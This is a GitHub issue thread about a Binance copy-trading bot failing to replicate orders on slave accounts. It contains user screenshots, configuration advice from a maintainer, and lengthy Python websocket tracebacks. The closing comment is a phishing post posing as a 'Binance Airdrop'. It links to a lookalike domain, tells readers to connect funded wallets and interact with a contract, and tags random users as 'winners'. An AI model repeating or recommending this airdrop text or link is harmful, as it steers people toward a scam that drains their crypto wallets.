### ISSUE TITLE
Order not placed on slave

### ISSUE THREAD

**Issue by lucky-ali** [MohammedRashad/Crypto-Copy-Trader#22]
I am unable to place orders on the salve account. I am using the master branch and the trade pair used is RENUSDT

Config and Command prompt window
![image](https://user-images.githubusercontent.com/20534354/88217923-30225980-cc57-11ea-9881-6b16239543ad.png)

Pair used RENUSDT (Limit order placed via binance.com on master account) 
![image](https://user-images.githubusercontent.com/20534354/88218061-64961580-cc57-11ea-9771-4a14b1d475fc.png)

Slave account - No Limit order replicated.

![image](https://user-images.githubusercontent.com/20534354/88218155-8b544c00-cc57-11ea-8c14-07e4b6f07edc.png)

**Comment by mokolotron** [comment]
To begin with, I see in the screenshot that only the server started, but the copying program did not start. You may have forgotten to press the run button.
When the program is fully launched you will see message:  ` Using web socket` at the end.
![image](https://user-images.githubusercontent.com/42164022/88225592-6cfc4980-cc73-11ea-924b-edeecec74e18.png)

Secondly, I forgot to warn that the pairs that the program will copy will only be in the `config_files/symbols.csv `file. To add RENUSDT, you need to add the name of this trading pair to the end of the file.
So after that the file will look like :
```
ETHUSDT
BTCUSDT
ETHBTC
LTCBTC
RENUSDT
```

I didn’t include all the pairs because I couldn’t find a way to easily split the name of that pair into two names of two coins. Therefore, now you can only use trading pairs in which the first coin consists of 3 symbols. If you have any idea how to fix this then the function for splitting is located in ExchangeInterfaces/Exchange.py in get_trading_symbols() function

**Comment by lucky-ali** [comment]
Thanks, I clicked on the run button and i see the following now.

![image](https://user-images.githubusercontent.com/20534354/88230028-9912cd00-cc69-11ea-8682-7134cc3e3918.png)

I have added RENUSDT to the symbols.csv file i thought since RENUSDT was already in symbols2.csv it will be picked up automatically.

**Comment by mokolotron** [comment]
It happens when to use ony 1 slave account. You may use 2 or more slave accounts (Issue #8 )
It was fixed in develop branch.

**Comment by djcrawleravp** [comment]
Same problem using 2 slaves here
<img width="1920" alt="Screen Shot 2020-07-27 at 19 47 59" src="https://user-images.githubusercontent.com/12896341/88603077-1790b580-d042-11ea-8cbf-113ba3efb9fe.png">

**Comment by mokolotron** [comment]
@djcrawleravp make sure that you use python 3.7 [link](https://github.com/omnilib/aiomultiprocess/issues/21)

**Comment by djcrawleravp** [comment]
Python 3.7 Installed, do i have to install flask again?

How can i install it on python3.7?

<img width="1195" alt="Screen Shot 2020-07-29 at 12 07 42" src="https://user-images.githubusercontent.com/12896341/88824462-5f275680-d194-11ea-9282-70a4af18a33a.png">

**Comment by djcrawleravp** [comment]
I have installed Flask but the message stills when trying to launch the bot using python3.7

**Comment by mokolotron** [comment]
message that need to install flask or previus message `module 'asyncio' has no attribute 'run'`?

**Comment by codemasterlike** [comment]
Hi Mokolotron and all, i have error of "AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'" and not open trade on slaves
Appreciate your help to advise or guide me, please.
FYI, please. I use develop branch and already include the pair in symbols.csv, symbols2.csv, symbols3.csv, symbols4.csv


Thanks
:
alopc@alopc:~/copytrade/copytrade_dev$ python3 api.py
 * Serving Flask app "api" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: on
 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 250-118-210

Application started...

Reading configuration file...
2  Slave accounts detected

Get Master Orders...
'[]'
Opening Slave Accounts...

Opening Slave Account #0 ...

Get Slave Orders...
[]


Opening Slave Account #1 ...

Get Slave Orders...
[]

Will start copying from now...please place a new order

Open Master Orders are 0 ...
127.0.0.1 - - [04/Dec/2020 17:27:55] "GET /run HTTP/1.1" 302 -
Using web socket
127.0.0.1 - - [04/Dec/2020 17:27:55] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [04/Dec/2020 17:29:58] "GET / HTTP/1.1" 200 -
{'e': 'executionReport', 'E': 1607074758951, 's': 'CREAMBNB', 'c': 'LpDiehaWYwwMXLdK08WUkG', 'S': 'SELL', 'o': 'LIMIT', 'f': 'GTC', 'q': '0.81000000', 'p': '2.46420000', 'P': '0.00000000', 'F': '0.00000000', 'g': -1, 'C': '', 'x': 'NEW', 'X': 'NEW', 'r': 'NONE', 'i': 13626870, 'l': '0.00000000', 'z': '0.00000000', 'L': '0.00000000', 'n': '0', 'N': None, 'T': 1607074758949, 't': -1, 'I': 27463130, 'w': True, 'm': False, 'M': False, 'O': 1607074758949, 'Z': '0.00000000', 'Y': '0.00000000', 'Q': '0.00000000'}
{'e': 'outboundAccountInfo', 'E': 1607074758951, 'm': 10, 't': 10, 'b': 0, 's': 0, 'T': True, 'W': True, 'D': True, 'u': 1607074758949, 'B': [{'a': 'BNB', 'f': '17.85797932', 'l': '0.00000000'}, {'a': 'BCH', 'f': '0.19500000', 'l': '0.00000000'}, {'a': 'BAL', 'f': '3.66000000', 'l': '0.00000000'}, {'a': 'NMR', 'f': '0.08000000', 'l': '0.00000000'}, {'a': 'EGLD', 'f': '5.07000000', 'l': '0.00000000'}, {'a': 'CREAM', 'f': '0.00000000', 'l': '0.81000000'}, {'a': 'FIL', 'f': '1.90000000', 'l': '0.00000000'}], 'P': ['SPOT']}
Unhandled Error
Traceback (most recent call last):
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 330, in dataReceived
    self._flushReceiveBIO()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 295, in _flushReceiveBIO
    ProtocolWrapper.dataReceived(self, bytes)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/policies.py", line 120, in dataReceived
    self.wrappedProtocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 290, in dataReceived
    self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1206, in _dataReceived
    self.consumeData()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1218, in consumeData
    while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1578, in processData
    fr = self.onFrameEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1703, in onFrameEnd
    self._onMessageEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 318, in _onMessageEnd
    self.onMessageEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 627, in onMessageEnd
    self._onMessage(payload, self.message_is_binary)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 321, in _onMessage
    self.onMessage(payload, isBinary)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 32, in onMessage
    self.factory.callback(payload_obj)
  File "/home/alopc/copytrade/copytrade_dev/SlaveContainer.py", line 40, in on_event_handler
    p_event = self.master.process_event(event)
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 126, in process_event
    self.get_part(order_event['s'], order_event['q'], order_event['p'], order_event['S']),
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 193, in get_part
    balance = float(get_context_balance(symbol)['free'])
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 180, in _get_balance_coin_by_symbol
    return list(filter(lambda el: el['asset'] == symbol[:3], self.get_balance()))[0]
builtins.IndexError: list index out of range

Unhandled Error
Traceback (most recent call last):
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 586, in run
    reactor.run(installSignalHandlers=False)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/base.py", line 1283, in run
    self.mainLoop()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/base.py", line 1295, in mainLoop
    self.doIteration(t)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/epollreactor.py", line 235, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 258, in _disconnectSelectable
    selectable.connectionLost(failure.Failure(why))
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 519, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 327, in connectionLost
    protocol.connectionLost(reason)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 398, in connectionLost
    self._flushReceiveBIO()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 295, in _flushReceiveBIO
    ProtocolWrapper.dataReceived(self, bytes)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/policies.py", line 120, in dataReceived
    self.wrappedProtocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 290, in dataReceived
    self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1206, in _dataReceived
    self.consumeData()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1218, in consumeData
    while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1570, in processData
    fr = self.onFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1665, in onFrameData
    self._onMessageFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 309, in _onMessageFrameData
    self.onMessageFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 601, in onMessageFrameData
    self.frame_data.append(payload)
builtins.AttributeError: 'NoneType' object has no attribute 'append'

{'e': 'executionReport', 'E': 1607074758951, 's': 'CREAMBNB', 'c': 'LpDiehaWYwwMXLdK08WUkG', 'S': 'SELL', 'o': 'LIMIT', 'f': 'GTC', 'q': '0.81000000', 'p': '2.46420000', 'P': '0.00000000', 'F': '0.00000000', 'g': -1, 'C': '', 'x': 'NEW', 'X': 'NEW', 'r': 'NONE', 'i': 13626870, 'l': '0.00000000', 'z': '0.00000000', 'L': '0.00000000', 'n': '0', 'N': None, 'T': 1607074758949, 't': -1, 'I': 27463130, 'w': True, 'm': False, 'M': False, 'O': 1607074758949, 'Z': '0.00000000', 'Y': '0.00000000', 'Q': '0.00000000'}
{'e': 'outboundAccountInfo', 'E': 1607074758951, 'm': 10, 't': 10, 'b': 0, 's': 0, 'T': True, 'W': True, 'D': True, 'u': 1607074758949, 'B': [{'a': 'BNB', 'f': '17.85797932', 'l': '0.00000000'}, {'a': 'BCH', 'f': '0.19500000', 'l': '0.00000000'}, {'a': 'BAL', 'f': '3.66000000', 'l': '0.00000000'}, {'a': 'NMR', 'f': '0.08000000', 'l': '0.00000000'}, {'a': 'EGLD', 'f': '5.07000000', 'l': '0.00000000'}, {'a': 'CREAM', 'f': '0.00000000', 'l': '0.81000000'}, {'a': 'FIL', 'f': '1.90000000', 'l': '0.00000000'}], 'P': ['SPOT']}
Unhandled Error
Traceback (most recent call last):
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 330, in dataReceived
    self._flushReceiveBIO()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 295, in _flushReceiveBIO
    ProtocolWrapper.dataReceived(self, bytes)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/policies.py", line 120, in dataReceived
    self.wrappedProtocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 290, in dataReceived
    self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1206, in _dataReceived
    self.consumeData()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1218, in consumeData
    while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1578, in processData
    fr = self.onFrameEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1703, in onFrameEnd
    self._onMessageEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 318, in _onMessageEnd
    self.onMessageEnd()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 627, in onMessageEnd
    self._onMessage(payload, self.message_is_binary)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 321, in _onMessage
    self.onMessage(payload, isBinary)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 32, in onMessage
    self.factory.callback(payload_obj)
  File "/home/alopc/copytrade/copytrade_dev/SlaveContainer.py", line 40, in on_event_handler
    p_event = self.master.process_event(event)
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 126, in process_event
    self.get_part(order_event['s'], order_event['q'], order_event['p'], order_event['S']),
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 193, in get_part
    balance = float(get_context_balance(symbol)['free'])
  File "/home/alopc/copytrade/copytrade_dev/ExchangeInterfaces/BinanceExchange.py", line 180, in _get_balance_coin_by_symbol
    return list(filter(lambda el: el['asset'] == symbol[:3], self.get_balance()))[0]
builtins.IndexError: list index out of range

Unhandled Error
Traceback (most recent call last):
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 586, in run
    reactor.run(installSignalHandlers=False)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/base.py", line 1283, in run
    self.mainLoop()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/base.py", line 1295, in mainLoop
    self.doIteration(t)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/epollreactor.py", line 235, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 258, in _disconnectSelectable
    selectable.connectionLost(failure.Failure(why))
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 519, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/internet/tcp.py", line 327, in connectionLost
    protocol.connectionLost(reason)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 398, in connectionLost
    self._flushReceiveBIO()
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/tls.py", line 295, in _flushReceiveBIO
    ProtocolWrapper.dataReceived(self, bytes)
  File "/home/alopc/.local/lib/python3.8/site-packages/twisted/protocols/policies.py", line 120, in dataReceived
    self.wrappedProtocol.dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 290, in dataReceived
    self._dataReceived(data)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1206, in _dataReceived
    self.consumeData()
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1218, in consumeData
    while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1570, in processData
    fr = self.onFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 1665, in onFrameData
    self._onMessageFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/twisted/websocket.py", line 309, in _onMessageFrameData
    self.onMessageFrameData(payload)
  File "/home/alopc/.local/lib/python3.8/site-packages/autobahn/websocket/protocol.py", line 601, in onMessageFrameData
    self.frame_data.append(payload)
builtins.AttributeError: 'NoneType' object has no attribute 'append'

Exception in thread Thread-19:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'
Exception in thread Thread-21:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'
Exception in thread Thread-24:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'
Exception in thread Thread-46:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'
Exception in thread Thread-48:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'
Exception in thread Thread-51:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 1254, in run
    self.function(*self.args, **self.kwargs)
  File "/home/alopc/.local/lib/python3.8/site-packages/binance/websockets.py", line 544, in _keepalive_account_socket
    callback = self._user_callback
AttributeError: 'BinanceSocketManager' object has no attribute '_user_callback'

**Comment by mokolotron** [comment]
Hello. Try to use master branch. Currently develop chages already commited into master and also fixed some bugs.

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @CDOchoa, @FOCI-DEV, @ptaranat, @franco, @kayrules, @manojkgorle, @celalaksu
